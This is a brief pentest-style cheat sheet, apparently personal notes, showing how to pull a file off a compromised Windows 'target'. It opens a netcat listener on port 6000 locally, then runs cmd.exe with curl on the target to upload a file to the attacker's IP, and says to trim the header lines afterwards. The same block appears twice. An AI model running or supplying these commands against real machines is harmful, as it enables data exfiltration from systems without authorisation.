Transfer file from remote to local
# local
$ nc -lvkp 6000 > save.bin
# target
cmd.exe /c curl -F "file=@save.exe" myip:6000
when it's completed, delete several lines in the head and tail of the bin file.
# local
$ nc -lvkp 6000 > save.bin
# target
cmd.exe /c curl -F "file=@save.exe" myip:6000
when it's completed, delete several lines in the head and tail of the bin file.